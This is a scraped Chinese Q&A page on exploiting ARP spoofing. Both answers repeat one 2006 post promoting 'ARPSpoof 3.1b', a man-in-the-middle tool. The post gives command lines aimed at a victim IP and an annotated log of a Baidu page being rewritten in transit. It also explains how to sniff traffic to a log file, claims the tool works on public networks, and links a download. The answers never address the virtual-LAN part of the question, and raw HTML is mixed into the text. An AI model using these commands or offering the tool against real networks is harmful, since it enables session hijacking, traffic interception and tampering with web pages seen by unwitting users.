微信导航犬 > ARP欺骗的利用和如何构建虚拟局域网?

ARP欺骗的利用和如何构建虚拟局域网?

2025-12-03 23:43:38
推荐回答(2个)
回答1:

主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击
说明: 本程序公开源代码,为了换取更多朋友的指教

实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释)
效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。
F:\arpspoof\Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定

F:\arpspoof\Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30

Parsing rul Hack by cooldiyer # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板<br><br> Parsing rul <HEA ==> Hack by cooldiyer<noframes><br>[+] Loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断<br><br> Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串<br><br> Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............<br><br> Forwarding untouched packet of size 62<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80<br><br> Forwarding untouched packet of size 60<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80<br><br> Forwarding untouched packet of size 399<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304<br><br> Forwarding untouched packet of size 60<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。<br>Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”<br><br> Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304<br><br> Forwarding untouched packet of size 1474<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80<br><br> Forwarding untouched packet of size 60<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304<br><br> Forwarding untouched packet of size 237<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80<br><br> Forwarding untouched packet of size 60<br>[+] Reseting ..... # Ctrl+C,程序自动恢复受骗主机的ARP缓存<br>[-] Sleep 5s ............ # 5秒退出<br>__________________________________________________________________________________<br><br>其它说明:<br>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log<br>可保存数据到文件,<br>arpspoof 192.168.0.1 192.168.0.108 80 2 1<br>只显示数据<br>被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt</p> </div> </div> <div class="clear"></div> </div> <div class="wdhdnr"> <div class="huidanrtop"> <div class="wdhuidaxinx"> <div class="wdhuidaxm">回答2:</div> </div> </div> <div class="clear"></div> <div class="wdhuidanrmid"> <div class="zuijiacont"> <p>主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击<br>说明: 本程序公开源代码,为了换取更多朋友的指教<br><br>实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释)<br>效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。<br>图解:<br>__________________________________________________________________________________<br>F:&#92;arpspoof&#92;Release>arpspoof /n<br>ARPSpoof 3.1b by CoolDiyer 06-10-30<br>[+] Replace Job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定<br><br>F:&#92;arpspoof&#92;Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt<br>ARPSpoof 3.1b by CoolDiyer 06-10-30<br><br>Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板<br><br> Parsing rul <HEA ==> Hack by cooldiyer<noframes><br>[+] Loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断<br><br> Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串<br><br> Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............<br><br> Forwarding untouched packet of size 62<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80<br><br> Forwarding untouched packet of size 60<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80<br><br> Forwarding untouched packet of size 399<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304<br><br> Forwarding untouched packet of size 60<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。<br>Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”<br><br> Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304<br><br> Forwarding untouched packet of size 1474<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80<br><br> Forwarding untouched packet of size 60<br>[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304<br><br> Forwarding untouched packet of size 237<br>[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80<br><br> Forwarding untouched packet of size 60<br>[+] Reseting ..... # Ctrl+C,程序自动恢复受骗主机的ARP缓存<br>[-] Sleep 5s ............ # 5秒退出<br>__________________________________________________________________________________<br><br>其它说明:<br>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log<br>可保存数据到文件,<br>arpspoof 192.168.0.1 192.168.0.108 80 2 1<br>只显示数据<br>被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt<br>需要说的是程序在公网下照样使用,我已经解说过了,不再举例.........<br>规则文件的使用可以看程序的书写,本程序开放源代码<br>希望测试出更多Bug, 我努力更新。。<br>By CoolDiyer 2006-11-12<br><br>下载地址:http://201314.free.fr/attachments/200612/arpspoof.3.1.zip</p> </div> </div> <div class="clear"></div> </div> </div> </div> <div class="wendaright"> <div class="wdluluerwema"> <div class="wdxgwttop">相关问答</div> <div class="wdxgwtnr"> </div> <div class="clear"></div> </div> <!-- 其他随机问答['id'=>alphaID($like['zid'])] --> <div class="wdluluerwema"> <div class="wdxgwttop">最新问答</div> <div class="wdxgwtnr"> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/1576030062037207740.html">我男。朋友会无缘无故给你介绍对象吗?玩得好的一位女性朋友给我介绍对象,到底是真的想当红娘,还是看上</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/2210226762226864788.html">【车主点评:说说我的大众探岳提车用车心路历程】</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/82660897.html">网页打不开,打开网页时,弹出windows关闭此程序。怎么处理</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/1891852246855446508.html">又一“精品”SUV来袭!车长4.7米,让车主不满意的地方:暂且没有</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/368325300277256372.html">今日份提车,荣威i6我的最爱,挺适合我的</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/530487495.html">1.6明锐保养换机油,灰壳5W-30太高级了吗?蓝壳5W-30就足够了吗?</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/82482491.html">为什么我第四次了还疼?</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/328362643.html">光的反射定律是什么</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/1994109401815257827.html">荣威rx3能跑多少报废</a></div> </div> <div class="wdxgwtcont"> <div class="wdxgtitle"><a href="https://www.wxdog.cc/a/1678242284048130667.html">车库尺寸</a></div> </div> </div> </div> </div> <div class="clear"></div> <div class="footer"> <!-- 移动底部导航 --> <div class="fanhuitop"><a href="#top" ref="nofollow"><img src="https://www.wxdog.cc/static/old/img/fhtop.png" alt="返回顶部" title="返回顶部"></a></div> <div class="dibu"> <div class="dibu"> </div> </div> <div class="banquan"> <p>内容全部来源于网络收集,如有侵权,请联系网站删除!</p> <p>QQ:24596024</p> </div> </div> </div> </div> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?014aa3de00af432583aa655293d508f9"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> </body> </html>